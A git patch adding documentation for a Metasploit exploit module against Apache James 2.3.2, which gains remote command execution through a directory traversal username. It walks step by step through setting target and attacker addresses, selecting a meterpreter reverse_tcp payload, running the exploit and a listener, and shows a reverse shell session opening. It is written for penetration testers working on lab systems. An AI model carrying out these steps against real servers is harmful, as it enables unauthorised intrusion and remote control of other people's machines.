From 195d699df04875b7dbf5aaf1e2d27fb9b3d287cd Mon Sep 17 00:00:00 2001 From: mattaberegg Date: Sat, 18 Jan 2020 19:06:59 -0800 Subject: [PATCH] Add module documentation. --- .../exploit/linux/smtp/apache_james_exec.md | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 documentation/modules/exploit/linux/smtp/apache_james_exec.md diff --git a/documentation/modules/exploit/linux/smtp/apache_james_exec.md b/documentation/modules/exploit/linux/smtp/apache_james_exec.md new file mode 100644 index 0000000000..0812b8d2cd --- /dev/null +++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md @@ -0,0 +1,77 @@ +## Vulnerable Application + This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here: + https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf + +## Verification Steps + 1. Load the module: +``` + msf5 > use exploit/linux/smtp/apache_james_exec +``` + + 2. Set remote and local options: +``` + msf5 exploit(linux/smtp/apache_james_exec) > set target 1 + target => 1 + msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 + rhosts => 192.168.224.164 + msf5 exploit(linux/smtp/apache_james_exec) > set rport 25 + rport => 25 + + msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 + lhost => 192.168.224.167 + msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444 + lport => 4444 +``` + + 3. Set payload: +``` + msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp +``` + + 4. Check version and run exploit: +``` + msf5 exploit(linux/smtp/apache_james_exec) > check + [*] 192.168.224.164:25 - The target appears to be vulnerable. + msf5 exploit(linux/smtp/apache_james_exec) > exploit + + [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes) +``` + + 5. Set up and run listener (Can be done before running exploit): +``` + msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler + msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp + msf5 exploit(multi/handler) > set lport 4444 + lport => 4444 + msf5 exploit(multi/handler) > set lhost 192.168.224.167 + lhost => 192.168.224.167 + + msf5 exploit(multi/handler) > run + + [*] Started reverse TCP handler on 192.168.224.167:4444 + [*] Sending stage (3021284 bytes) to 192.168.224.164 + [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800 + + meterpreter > +``` + +## Options + **USERNAME:** The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. + **PASSWORD:** The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. + **ADMINPORT:** The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. + **RHOSTS:** The IP address of the vulnerable server. + **RPORT:** The port number of the SMTP service. + +## Targets +``` + Id Name + -- ---- + 0 Linux x86 + 1 Linux x64 +``` + +## References + 1. + 2.